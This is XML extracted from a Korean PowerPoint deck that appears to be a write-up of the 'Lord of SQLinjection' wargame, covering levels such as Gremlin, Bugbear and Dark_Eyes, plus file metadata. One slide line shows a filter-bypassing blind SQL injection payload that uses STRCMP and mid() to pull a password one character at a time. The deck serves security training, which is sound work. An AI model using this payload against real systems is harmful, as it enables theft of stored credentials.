              <a:rPr lang="sv-SE" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>는 참이면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>을 그 외에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>을 반환한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" dirty="0"/>
              <a:t>?no=1/**/||/**/(1-STRCMP(mid(pw,1,1),”a”))%2/**/%23’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="sv-SE" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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7A849-D98A-417F-B73A-AACF266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9</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/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22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9073</TotalTime>
  <Words>1042</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>130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Lord of SQLinjection</vt:lpstr>
      <vt:lpstr>목 차</vt:lpstr>
      <vt:lpstr>워게임 풀이 현황</vt:lpstr>
      <vt:lpstr>Level 1 (Gremlin)</vt:lpstr>
      <vt:lpstr>Level 1 (Gremlin)</vt:lpstr>
      <vt:lpstr>Level 1 (Gremlin)</vt:lpstr>
      <vt:lpstr>Level 13 (Bugbear)</vt:lpstr>
      <vt:lpstr>Level 13 (Bugbear)</vt:lpstr>
      <vt:lpstr>Level 13 (Bugbear)</vt:lpstr>
      <vt:lpstr>Level 13 (Bugbear)</vt:lpstr>
      <vt:lpstr>Level 13 (Bugbear)</vt:lpstr>
      <vt:lpstr>Level 22 (Dark_Eyes)</vt:lpstr>
      <vt:lpstr>Level 22 (Dark_Eyes)</vt:lpstr>
      <vt:lpstr>Level 22 (Dark_Eyes)</vt:lpstr>
      <vt:lpstr>Level 22 (Dark_Eyes)</vt:lpstr>
      <vt:lpstr>Level 22 (Dark_Eyes)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박성유</cp:lastModifiedBy>
  <cp:revision>743</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-11T10:23:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-05T08:52:29Z</dcterms:modified>
</cp:coreProperties>
</file>